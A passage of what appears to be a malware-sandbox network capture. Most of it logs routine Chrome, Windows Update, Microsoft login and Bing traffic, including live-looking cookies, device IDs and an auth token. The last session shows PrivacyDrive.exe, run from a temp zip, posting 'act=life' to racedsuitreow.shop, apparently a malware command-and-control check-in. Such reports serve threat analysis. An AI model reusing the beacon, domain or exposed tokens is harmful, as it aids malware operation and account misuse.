2024-09-26 15:41:27 UTC	913	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 34 39 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 32 37 33 36 35 32 38 34 39 30 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.149"],[1,0,0,0,0]]],373,[["1727365284908",null,null,null,
2024-09-26 15:41:27 UTC	937	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=517=nUkmbzndZ5-tzH2SxDNRpjft1QJMOd6XJWc3MFaFkGnHDDFsQpxBqOiRzjUNnqw8Lj1gwbFH5bhV9aKYA4W-vlWf93rmmjmD129Bx2ikGEpkO0RV_2RtjQ7ydcR41bew6FMy2gDy4ViuCM8UNMcezM13K0NtzksY2gw_FDXtzlwKd_n8dd4; expires=Fri, 28-Mar-2025 15:41:27 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 26 Sep 2024 15:41:27 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 26 Sep 2024 15:41:27 GMT Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:27 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-09-26 15:41:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.17	49730	142.250.186.110	443	6452	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:29 UTC	923	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 918 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIkqHLAQiFoM0BCLnKzQEIitPNAQjB1M0BCLrYzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: NID=517=nUkmbzndZ5-tzH2SxDNRpjft1QJMOd6XJWc3MFaFkGnHDDFsQpxBqOiRzjUNnqw8Lj1gwbFH5bhV9aKYA4W-vlWf93rmmjmD129Bx2ikGEpkO0RV_2RtjQ7ydcR41bew6FMy2gDy4ViuCM8UNMcezM13K0NtzksY2gw_FDXtzlwKd_n8dd4
2024-09-26 15:41:29 UTC	918	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 34 39 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 32 37 33 36 35 32 38 36 37 39 31 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.149"],[1,0,0,0,0]]],373,[["1727365286791",null,null,null,
2024-09-26 15:41:29 UTC	945	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=517=dFXKzHGnhRGJxa66y6HtkqsPEkWY_7mUu6IRE8kUnz2BDE7aKBhgUMTu1KKaykowhVsx7Ddm_oDxfV441N8IpYs7KKIfFJAEq49GyCqAkvGlcaBn8s5BB39O-HUBYEGGv4AAaVgRtwFkkrHDm05Dw7tolJWdQK0w5foF47Kq3QA_BQ-7bGCQLxHqvUw; expires=Fri, 28-Mar-2025 15:41:29 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Thu, 26 Sep 2024 15:41:29 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Thu, 26 Sep 2024 15:41:29 GMT Connection: close Transfer-Encoding: chunked
2024-09-26 15:41:29 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-09-26 15:41:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.17	49731	4.175.87.197	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:31 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=2bKyk+phhzcxLy4&MD=VEcd6h4b HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-09-26 15:41:32 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 0ea9f5ee-c264-4934-8faa-e7cc1ffd9bc9 MS-RequestId: f76862a9-c67d-4f5a-9c7a-7f1b99ce5b8d MS-CV: 5a/XLj8N4EuyrRro.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 26 Sep 2024 15:41:31 GMT Connection: close Content-Length: 30005
2024-09-26 15:41:32 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK\|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
2024-09-26 15:41:32 UTC	14181	IN	Data Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro

Session ID	Source IP	Source Port	Destination IP	Destination Port
14	192.168.2.17	49732	40.126.29.10	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:39 UTC	422	OUT	POST /RST2.srf HTTP/1.0 Connection: Keep-Alive Content-Type: application/soap+xml Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68}) Content-Length: 4808 Host: login.live.com
2024-09-26 15:41:39 UTC	4808	OUT	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-09-26 15:41:40 UTC	569	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Type: application/soap+xml; charset=utf-8 Expires: Thu, 26 Sep 2024 15:40:40 GMT P3P: CP="DSP CUR OTPi IND OTRi ONL FIN" Referrer-Policy: strict-origin-when-cross-origin x-ms-route-info: C529_BAY x-ms-request-id: 5998eeba-d0f6-4bb0-9da7-34caa5be0c58 PPServer: PPV: 30 H: PH1PEPF00011E4F V: 0 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block Date: Thu, 26 Sep 2024 15:41:39 GMT Connection: close Content-Length: 11177
2024-09-26 15:41:40 UTC	11177	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200

Session ID	Source IP	Source Port	Destination IP	Destination Port
15	192.168.2.17	49733	13.107.5.88	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:40 UTC	537	OUT	GET /ab HTTP/1.1 Host: evoke-windowsservices-tas.msedge.net Cache-Control: no-store, no-cache X-PHOTOS-CALLERID: 9NMPJ99VJBWV X-EVOKE-RING: X-WINNEXT-RING: Public X-WINNEXT-TELEMETRYLEVEL: Basic X-WINNEXT-OSVERSION: 10.0.19045.0 X-WINNEXT-APPVERSION: 1.23082.131.0 X-WINNEXT-PLATFORM: Desktop X-WINNEXT-CANTAILOR: False X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd} X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI= If-None-Match: 2056388360_-1434155563 Accept-Encoding: gzip, deflate, br
2024-09-26 15:41:40 UTC	209	IN	HTTP/1.1 400 Bad Request X-MSEdge-Ref: Ref A: F8E0ADC339CD4E1981DD26BED4142FC5 Ref B: EWR311000103045 Ref C: 2024-09-26T15:41:40Z Date: Thu, 26 Sep 2024 15:41:40 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.17	49734	2.23.209.181	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:41:40 UTC	2575	OUT	GET /client/config?cc=CH&setlang=en-CH HTTP/1.1 X-Search-CortanaAvailableCapabilities: None X-Search-SafeSearch: Moderate Accept-Encoding: gzip, deflate X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A} X-UserAgeClass: Unknown X-BM-Market: CH X-BM-DateFormat: dd/MM/yyyy X-Device-OSSKU: 48 X-BM-DTZ: -240 X-DeviceID: 01000A41090080B6 X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E X-Search-TimeZone: Bias=300; DaylightBias=-60; TimeZoneKeyName=Eastern Standard Time X-BM-Theme: 000000;0078d7 X-Search-RPSToken: t%3DEwDoAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAc3b2YHaGqVpvDt5fQD5WqyWe6yFx0NJba5UkXc18NyzzO727EJpRxajMi/a9VJGG3IbazdVCfGYDhgWix1bEZvF%2Bdi6BQDemUJPwGpTbVYCsJTXlSnyGJ9pvzXtUVpRc7a/IucKShQdkeIn8vjlkWQ7B633Nt88ruPHqsBG61WOzjNulLatGW7xuEYlrxV%2BAnUId2LPnjd3yXu39dIiVTHguri5j1XBxEHqhB/8RgSnKKM62AL1clVhb53mRWM362Q6dIqt85fZg5KeStaKPrIBled%2BkdJUzvKkym95jria/PiUdNMSRul6lJW3pVWndWcGee1xmuRa5Mb/7VE1NgkQZgAAEIjN2Vud26lqrpa0nLDGu7mwATElC8QCEnO8xLw8TUG3E9an0zcpJWgBIfsWEMqk4oxdn3M93RNPyGW1AjlXb6Gn06SvkSvESnWEl8Wy3kp9o6ejpwFdKJjdrk7hP6ZPSOLYmQiiYo1%2B1tZ5fAIOIIKQ44iMjdOSTkgtIdAxzwOu8gVhNL6PiW374UhLKIejrg9C1J/Pkmhmmiqj6pH/r/epLtFJWif%2BwQX13KWyyPTH7OXyukCnKh%2B/FnJjMl/%2B/KRwLRgllZnqiDw8TNu6i7WVri08tW6uWwioHgIeW6KGw7y3T/GADdXA0p1jxGHBBTIX1HgpKfBxb9XY6ZjIGxtXtUiDCkGR97GpPTGKxse8/Zhyul1ICKaK6Xxc3jXPpqlUivMvW6hV/TZTk7RXJEhnAlKYwqAHpQ7BO77iekqC5o1BgoDVu1sSh12WSziYoXkSEDemQjLyNIGzZsnoVDCfuP7EFUhDMUH5GmAdL7YqGiLffNCrogzj9okNNDGCflw7%2BG3/zT5pAGW11JKD3TdgQy0PuP/OfzJ5yAYJClx168oHYvHzegIaXl4V%2BwcCy5LQhl7RxmWmRyj4M4U [TRUNCATED] X-Agent-DeviceId: 01000A41090080B6 X-BM-CBT: 1727365298 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 X-Device-isOptin: false Accept-language: en-GB, en, en-US X-Device-Touch: false X-Device-ClientSession: 2814152BF41F4137A196F50A19FC20E3 X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI Host: www.bing.com Connection: Keep-Alive Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
2024-09-26 15:41:41 UTC	1147	IN	HTTP/1.1 200 OK Content-Length: 2215 Content-Type: application/json; charset=utf-8 Cache-Control: private X-EventID: 66f580b5a5eb4241aac71e39866f4ed3 X-AS-SetSessionMarket: de-ch UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0= X-XSS-Protection: 0 P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND" Date: Thu, 26 Sep 2024 15:41:41 GMT Connection: close Set-Cookie: _EDGE_S=SID=050345EA89CE67BC171550EC88FE669A&mkt=de-ch; domain=.bing.com; path=/; HttpOnly Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Tue, 21-Oct-2025 15:41:41 GMT; path=/; secure; SameSite=None Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None Set-Cookie: _SS=SID=050345EA89CE67BC171550EC88FE669A; domain=.bing.com; path=/; secure; SameSite=None Alt-Svc: h3=":443"; ma=93600 X-CDN-TraceID: 0.05d01702.1727365301.ac73a6e
2024-09-26 15:41:41 UTC	2215	IN	Data Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 31 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 46 65 61 74 75 72 65 43 6f 6e 66 69 67 22 3a 7b 22 53 65 61 72 63 68 42 6f 78 49 62 65 61 6d 50 6f 69 6e 74 65 72 4f 6e 48 6f 76 65 72 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 68 6f 77 53 65 61 72 63 68 47 6c 79 70 68 4c 65 66 74 4f 66 53 65 61 72 63 68 42 6f 78 22 3a 7b 22 76 61 6c 75 65 22 3a 74 72 75 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 6f 78 55 73 65 53 65 61 72 63 68 49 63 6f 6e 41 74 52 65 73 74 22 3a 7b 22 76 61 6c 75 65 22 3a 66 61 6c 73 65 2c 22 66 65 61 74 75 72 65 22 3a 22 22 7d 2c 22 53 65 61 72 63 68 42 75 74 74 6f 6e 55 73 65 53 65 61 72 63 68 49 63 6f 6e 22 3a 7b 22 76 61 6c 75 65 Data Ascii: {"version":1,"config":{"FeatureConfig":{"SearchBoxIbeamPointerOnHover":{"value":true,"feature":""},"ShowSearchGlyphLeftOfSearchBox":{"value":true,"feature":""},"SearchBoxUseSearchIconAtRest":{"value":false,"feature":""},"SearchButtonUseSearchIcon":{"value

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.17	49738	172.67.206.221	443	364	C:\Users\user\AppData\Local\Temp\Temp1_il222.zip\PrivacyDrive.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:42:09 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: racedsuitreow.shop
2024-09-26 15:42:09 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 15:42:09 UTC	551	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 15:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QXX8Os1r0zQlQgeWTrFmNdQYIL5DJ8c5h%2FSVltqh%2BQdQKmS1Phs9RIqlqnGkmxMcRIxgCKbc5d4Acl3%2BQLGtbG60e69YjesPx29ZnuDHFMPYAoEYxzwOUaizKCadM7tZi3hVgss%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c945cbbdb2d19c3-EWR
2024-09-26 15:42:09 UTC	818	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
